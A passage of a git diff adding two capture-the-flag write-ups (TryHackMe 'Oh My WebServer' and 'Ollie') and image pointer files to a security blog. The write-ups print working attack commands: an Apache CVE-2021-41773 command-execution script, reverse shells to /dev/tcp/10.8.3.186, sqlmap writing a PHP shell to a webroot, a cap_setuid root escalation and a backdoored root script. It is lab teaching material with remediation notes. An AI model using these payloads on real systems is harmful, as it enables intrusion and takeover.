+oid sha256:b1a7421241ba654ca030d9945d4cf3636b0acaa1128b7dbac6d8d41da8fae945
+size 14096
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png
new file mode 100644
index 0000000..f0f9a4c
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2351d8ba7bc08b6932ad9cf5c25d821e0f25e20c2fe053be59f76cec36f5823f
+size 44982
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp
new file mode 100644
index 0000000..6d18d3e
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:020e86a0b229d11f58d79383ecb8e6280f968e2e9c9d67338ef7cdf92e7ed02f
+size 38572
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png
new file mode 100644
index 0000000..4ea0353
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:899e1377d273f0d9ff7a0a721e5d2fd5f7884f031f83b19ec58a32d5a1c3e8b4
+size 21732
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp
new file mode 100644
index 0000000..439cf66
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3901df76c761988582d057835727d31b1e0fb6b29f18a3930787bf8bd9a4a229
+size 16766
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png
new file mode 100644
index 0000000..7b5f71f
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:bd6a473c03da066e20d293a8294a92067ddac48fdc14380e089058418aeed1af
+size 32835
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp
new file mode 100644
index 0000000..147ca3b
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ff038f690a3a7f6ae325711eb3d315087d6fceb64d3346a466a1cf0a7f5b5cf7
+size 22312
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png
new file mode 100644
index 0000000..90ba36d
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f2b110853c2f30a01693811870e7d5cee63d8d47e993d038874c2df644422f7d
+size 23909
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp
new file mode 100644
index 0000000..a374d9a
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:06fee1be334b0f228b82af19df52815f06c53c4e2a8f99048723bfb0cc9c72a9
+size 18808
diff --git a/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md b/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md
new file mode 100644
index 0000000..05f2ca5
--- /dev/null
+++ b/content/writeup-ctf/writeup-oh-my-webserver-thm/index.md
@@ -0,0 +1,120 @@
+---
+title: "Writeup - Oh My WebServer (THM)"
+date: 2022-03-10
+slug: "writeup-oh-my-webserver-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [oh my webserver](https://tryhackme.com/room/ohmyweb) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.9.138
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : HTTP web server (Apache 2.4.49)
+
+![](img/image-2.webp)
+
+## Exploit
+
+After some research, I find that this version of Apache is exploitable with the [CVE-2021-41773](https://www.exploit-db.com/exploits/50383). This exploit allows to execute code via a transverse path.
+
+So I create a shell script with the following content:
+
+
+```bash
+#!/bin/bash
+
+if [[ $1 == '' ]]; [[ $2 == '' ]]; then
+echo Set [TAGET-LIST.TXT] [PATH] [COMMAND]
+echo ./PoC.sh targets.txt /etc/passwd
+exit
+fi
+for host in $(cat $1); do
+echo $host
+curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done
+```
+After adding the execution rights, I run the script with the id command to check that the target is exploitable with this exploit.
+
+![](img/image-3.webp)
+
+The exploit works, now let's create a reverse shell :
+
+
+```bash
+bash exploit.sh targets.txt /bin/sh 'bash -c "bash -i >& /dev/tcp/10.8.3.186/1234 0>&1"'
+```
+![](img/image-4.webp)
+
+I am now connected, but I quickly notice that I am in a docker. I upload [linPeas](linpeas.sh), to make a first analysis of the environment:
+
+
+```bash
+daemon@4a70924bafa0:/tmp$ curl 10.8.3.186:81/linpeas.sh > linpeas.sh
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+100  747k  100  747k    0     0  3415k      0 --:--:-- --:--:-- --:--:-- 3415k
+daemon@4a70924bafa0:/tmp$ chmod +x linpeas.sh
+```
+![](img/image-5.webp)
+
+Python3 has a "cap\_setuid", I will be able to use this to get the route access in the docker. To do this I use the command found on [GTFOBins](https://gtfobins.github.io/gtfobins/python/#capabilities) :
+
+
+```bash
+python3 -c 'import os; os.setuid(0); os.system("/bin/sh")'
+```
+![](img/image-6.webp)
+
+I now have root access in the docker and I can get the first flag!
+
+## Privilege escalation
+
+I'm still in a docker, so to take control of the target machine I'll have to find a way out of the docker...
+
+Generally, there are open ports between the host and a docker. These ports are used for services (web, database, ...), but also in some cases for docker management.
+
+So I will first perform an nmap scan in the docker. To do this I will download the [nmap binary](https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) and upload it in the docker.
+
+
+```bash
+daemon@4a70924bafa0:/tmp$ curl 10.8.3.186:81/nmap > nmap
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+100 5805k  100 5805k    0     0  9740k      0 --:--:-- --:--:-- --:--:-- 9723k
+daemon@4a70924bafa0:/tmp$ chmod +x nmap
+```
+Je sais que l'ip du docker est 172.17.0.2, il y a donc de forte chance que l'IP de l'hote soit 172.17.0.1. Teston cette IP dans un premier temps :
+
+
+```bash
+./nmap 172.17.0.1 -p-
+```
+![](img/image-7.webp)
+
+In addition to ports 22 and 80, I find an unknown port: 5986. After some research I quickly find out that this is a port generally used to perform a remote management of Azure machines (Microsoft cloud).
+
+I found this [site](https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure/) that indicates a number of CVEs including one that allows a root connection without authentication: CVE-2021-38647. Let's look for a script allowing its exploitation.
+
+I find this [script](https://github.com/horizon3ai/CVE-2021-38647), which allows to send commands to the host as root. This will allow us to get the last flag :
+
+![](img/image-8.webp)
+
+To take control of the host, we just need to retrieve "id\_rsa" contained in the "/root/.ssh" folder and initiate an SSH connection with it.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Update Apache
+- Do not leave Python with the "CAP\_SETUID" set
+- Update OMI to patch CVE-2021-38647
diff --git a/content/writeup-ctf/writeup-ollie-thm/featured.png b/content/writeup-ctf/writeup-ollie-thm/featured.png
new file mode 100644
index 0000000..9d71bb1
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cfaf46c59867a962897c7b782bec43c4365d08d3c89b7e521f28f002ae95883e
+size 200283
diff --git a/content/writeup-ctf/writeup-ollie-thm/featured.webp b/content/writeup-ctf/writeup-ollie-thm/featured.webp
new file mode 100644
index 0000000..9be4e23
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a303e588a4a4dfb05565267f1770d79ef89260291d53db7629e13c182578257e
+size 142236
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-1.png b/content/writeup-ctf/writeup-ollie-thm/img/image-1.png
new file mode 100644
index 0000000..fee2b67
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4aef54f1f404885d3489127de15909143f789dac6a90e3f428cb2565170701e6
+size 28485
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp
new file mode 100644
index 0000000..919bc81
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e335c867c9728bdc95b39668ebefcb6770bc5b2b3768536aaf08b97e35569e7b
+size 26116
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-2.png b/content/writeup-ctf/writeup-ollie-thm/img/image-2.png
new file mode 100644
index 0000000..bb1137e
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:26cd9f2d1eedd06e659c78722034a347469771789fc554c966f904fedf899bdd
+size 930510
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp
new file mode 100644
index 0000000..fbb30c8
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f9166b47edf8d9fb1bd13853ed4ca5f6a6e1c4b348485d308f720549039ffd48
+size 80104
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-3.png b/content/writeup-ctf/writeup-ollie-thm/img/image-3.png
new file mode 100644
index 0000000..7d0d1b9
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f53e33e357bc63ed82431dd0b7ba0017dd1e019942ec520efed21aca917582e4
+size 2179837
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp
new file mode 100644
index 0000000..a7433d3
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ff3094bfc6bed3f697e6adbe2b5817604204d8dbedbba61bfea96dc816d88d43
+size 176986
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-4.png b/content/writeup-ctf/writeup-ollie-thm/img/image-4.png
new file mode 100644
index 0000000..7be34e8
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:0006fe079492d34a80be44c20c27a7d9ddf0dcf1074cdd56dc283e0c8a83ee8e
+size 339613
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp
new file mode 100644
index 0000000..de06ad9
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3656ef1e6bf62dd96ddcfd9aa6d52c153cc626badfa5bb6576f1dc7c943e0865
+size 46320
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-5.png b/content/writeup-ctf/writeup-ollie-thm/img/image-5.png
new file mode 100644
index 0000000..7c5247a
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6a94c3fbbbbf653d7768c5dd9f48fd1c2bf250c080f39c4b47486030cb263c79
+size 175016
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp
new file mode 100644
index 0000000..d7a36f4
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:fce647e8dfcd84db18ec204ef95cebcb7dfd8d5516ce6cf219c4d4fe187a30e4
+size 176006
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-6.png b/content/writeup-ctf/writeup-ollie-thm/img/image-6.png
new file mode 100644
index 0000000..13ecdef
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:94ca7c8d669b7ebfecbdd5889de6f7767abdb2db5a58e59ac6c464ce901f37e4
+size 28760
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp
new file mode 100644
index 0000000..6c71468
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7546cb116d018ea951ba2eedee3c370d36d319b94814ec7c7862c4e104a031c0
+size 24368
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-7.png b/content/writeup-ctf/writeup-ollie-thm/img/image-7.png
new file mode 100644
index 0000000..a2cca07
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3e98bf0d68a76bf67c498ef6770447adc50eeb97b06c38182801bd409896dae7
+size 10389
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp
new file mode 100644
index 0000000..b9d858e
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6778a7bb09055c83bc98b55677c816b3971d220625bd16fb09ba13ddc3767290
+size 9872
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-8.png b/content/writeup-ctf/writeup-ollie-thm/img/image-8.png
new file mode 100644
index 0000000..c957b40
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9b6b4a8a33f3605ef81635d52ed3532679a8d6c3935098d147b27fd4545255f0
+size 11042
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp
new file mode 100644
index 0000000..53733c4
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ec1967348cec7cb392937eb0f26b480f309d43ba9ba5ff023d9edf1c3b0fd242
+size 14112
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-9.png b/content/writeup-ctf/writeup-ollie-thm/img/image-9.png
new file mode 100644
index 0000000..ba59a68
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:72eb60d5aba874e9bb66afce2f07f825710b5c7954c281a6ae32c71a583a4d20
+size 19720
diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp
new file mode 100644
index 0000000..06d8dbc
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e75786cfbe23d79383e55073ea396e2d92ae527ce55b2e66d78f40f54e47ae16
+size 19686
diff --git a/content/writeup-ctf/writeup-ollie-thm/index.md b/content/writeup-ctf/writeup-ollie-thm/index.md
new file mode 100644
index 0000000..27d9221
--- /dev/null
+++ b/content/writeup-ctf/writeup-ollie-thm/index.md
@@ -0,0 +1,159 @@
+---
+title: "Writeup - Ollie (THM)"
+date: 2022-04-22
+slug: "writeup-ollie-thm"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Ollie](https://tryhackme.com/room/ollie) machine from the TryHackMe site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.147.194
+```
+Three TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2p1)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+- 1337/tcp : Chat and file  sharing (waste)
+
+![](img/image-2.webp)
+
+## Exploit
+
+First of all I connect via netcat to the waste port to see if I can get some information.
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ nc 10.10.147.194 1337             
+Hey stranger, I'm Ollie, protector of panels, lover of deer antlers.
+
+What is your name? azerty
+What's up, Azerty! It's been a while. What are you here for? test
+Ya' know what? Azerty. If you can answer a question about me, I might have something for you.
+
+
+What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog
+You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie...
+Please hold on a minute
+Ok, I'm back.
+After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel.
+
+                    Username: admin
+
+                    Password: OllieUnixMontgomery!
+
+PS: Good luck and next time bring some treats!
+
+```
+After some tests, I find that the chat returns credencials for an admin panel. If I go to the port 80 site, I find a login page, so I test the credencials and it works!
+
+![](img/image-3.webp)
+
+This is an administration page based on `phpIPAM 1.4` after some research I find the following exploit : [exploit](https://fluidattacks.com/advisories/mercury/). I try to apply it to see if it works. 
+
+![](img/image-4.webp)
+
+After following the different steps, the exploit works, so we can now perform SQL injections! To automate the upload process of a php reverse shell I will use `sqlmap`. I start by extracting a query with Burp :
+
+
+```bash
+POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1
+Host: 10.10.196.154
+Content-Length: 20
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Sa>
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+Origin: http://10.10.196.154
+Referer: http://10.10.196.154/index.php?page=tools&section=routing&subnetId=bgp&sPage=2
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: phpipamredirect=%2Findex.php%3Fpage%3Dtools%26section%3Drouting%26subnetId%3Dbgp%26sPage%3D2; phpipam=151l3>
+Connection: close
+
+subnet=test&bgp_id=2
+```
+Then with the following command I send my php file :
+
+
+```bash
+sqlmap -r request.txt --file-write=reverse.php --file-dest=/var/www/html/reverse.php --batch
+```
+![](img/image-5.webp)
+
+After running netcat I can access the file and create a reverse shell.
+
+![](img/image-6.webp)
+
+After some research I find that a user folder: `ollie`. So I try to change the user with the password I found before:
+
+![](img/image-7.webp)
+
+I can now recover the first flag.
+
+
+```bash
+ollie@hackerdog:~$ cat user.txt
+cat user.txt
+THM{Ollie_boi_is_daH_Cut3st}
+```
+## Privilege escalation
+
+I start by running [linpeas.sh](https://linpeas.sh) but I don't find anything interesting. So I try to list the services with [pspy64](https://github.com/DominicBreuker/pspy).
+
+
+```bash
+ollie@hackerdog:~$ ./pspy64
+./pspy64
+pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
+
+
+     ██▓███    ██████  ██▓███ ▓██   ██▓
+    ▓██░  ██▒▒██    ▒ ▓██░  ██▒▒██  ██▒
+    ▓██░ ██▓▒░ ▓██▄   ▓██░ ██▓▒ ▒██ ██░
+    ▒██▄█▓▒ ▒  ▒   ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
+    ▒██▒ ░  ░▒██████▒▒▒██▒ ░  ░ ░ ██▒▓░
+    ▒▓▒░ ░  ░▒ ▒▓▒ ▒ ░▒▓▒░ ░  ░  ██▒▒▒ 
+    ░▒ ░     ░ ░▒  ░ ░░▒ ░     ▓██ ░▒░ 
+    ░░       ░  ░  ░  ░░       ▒ ▒ ░░  
+                   ░           ░ ░     
+                               ░ ░     
+
+Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
+Draining file system events due to startup...
+done
+[...]
+2022/04/13 10:11:43 CMD: UID=0    PID=1355   | python3 -u olliebot.py
+[...]
+2022/04/13 10:12:04 CMD: UID=0    PID=37813  | /bin/bash /usr/bin/feedme
+[...]
+```
+In the result of the command I see 2 interesting services executed by the UID=0 i.e. root. The second one is a bash script but without any particular content. But I have write permission.
+
+![](img/image-8.webp)
+
+So I add a reverse shell in the file with the following command:
+
+
+```bash
+echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> /usr/bin/feedme
+```
+Then after a few seconds, I have a reverse shell root and I can recover the last flag.
+
+![](img/image-9.webp)
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Do not put credentials in a public chat
+- Do not use the same password for a session and a web service
+- Do not allow scripts executed by root to be writable by other users
diff --git a/content/writeup-ctf/writeup-pandora-htb/featured.png b/content/writeup-ctf/writeup-pandora-htb/featured.png
new file mode 100644
index 0000000..65151e1
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3896e27352033280100dbdaedc10fcea42f1a31a1c5ae3800964e92a7d522f0f
+size 278361
diff --git a/content/writeup-ctf/writeup-pandora-htb/featured.webp b/content/writeup-ctf/writeup-pandora-htb/featured.webp
new file mode 100644
index 0000000..ed75896
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:90bc42a8d6b64b982b879cb8d8bc687f0143df2610e1f60731752cf9bf6b75c7
+size 27134
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-1.png b/content/writeup-ctf/writeup-pandora-htb/img/image-1.png
new file mode 100644
index 0000000..4b532b3
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:9ad28dc81c668f635dcd23a36563670ff499f77e0e5416d13ebde7df480becc8
+size 52933
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp
new file mode 100644
index 0000000..d385839
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1d6359acfe320430a98508df03316cd083f0697a610c3ca78e99482779d61866
+size 50354
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-10.png b/content/writeup-ctf/writeup-pandora-htb/img/image-10.png
new file mode 100644
index 0000000..fdb9cf1
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2158090d6e417aad45b07e63622456db610a47c2e58e299e7382cf3937ff081e
+size 22128
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp
new file mode 100644
index 0000000..6dd841a
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:860a66b29134bf125aa27a8373647def07d6c2d0409c1ce737397337c992800f
+size 21376
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-11.png b/content/writeup-ctf/writeup-pandora-htb/img/image-11.png
new file mode 100644
index 0000000..600695c
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7c02edc247a4adbd15f6e98f26cd874f695cbd2dce229a7c624085e5c73084df
+size 14133
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp
new file mode 100644
index 0000000..fe720d0
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:71c9abdb537d5872adcca73056445a0ef5af125a39f04d04f6f83297107b3f90
+size 14282
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-2.png b/content/writeup-ctf/writeup-pandora-htb/img/image-2.png
new file mode 100644
index 0000000..b8870bf
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:95a78c77d0be28aa868c2db45b5f72bfec127432ef6fd642adfa75df541fe301
+size 7799
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp
new file mode 100644
index 0000000..292d03e
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7e9c9f78705cf78b7f888f3a1afe93a5e78049c8f6dec9afacfd65777e07d553
+size 8626
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-3.png b/content/writeup-ctf/writeup-pandora-htb/img/image-3.png
new file mode 100644
index 0000000..8da395a
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d2d8e595183115f1eea997f3d84f00e6b936bd37e30e3d71b9bf4b3dc2c8e5e5
+size 61354
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp
new file mode 100644
index 0000000..4cc7139
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2fcf00c893eea9a82351a6a5a33985ae9de2b4232160b0107c1377a6f2a3f411
+size 52110
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-4.png b/content/writeup-ctf/writeup-pandora-htb/img/image-4.png
new file mode 100644
index 0000000..2d63b92
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c49b39eff68e54203094258b6488adf59f093e2c846743c2a38d57e53b9a89d0
+size 109159
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp
new file mode 100644
index 0000000..4eeb0b1
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6120c24b0a5b7b4ec6529e1df0f204582ebe8f9f9d9139d6a7a64d50ed2e005f
+size 101174
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-5.png b/content/writeup-ctf/writeup-pandora-htb/img/image-5.png
new file mode 100644
index 0000000..cf65233
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e8dcfc3fd6f0c9474c00ef9ae02bded796c996bc31f9e7f4417dbe99eca26a3e
+size 44176
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp
new file mode 100644
index 0000000..729f63f
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5294b47c545b951d6d9494b34c6fceff04c67af75f55a56c1e85024151f3d968
+size 34726
diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-6.png b/content/writeup-ctf/writeup-pandora-htb/img/image-6.png
new file mode 100644
index 0000000..fdc8efc
--- /dev/null
+++ b/content/writeup-ctf/writeup-pandora-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
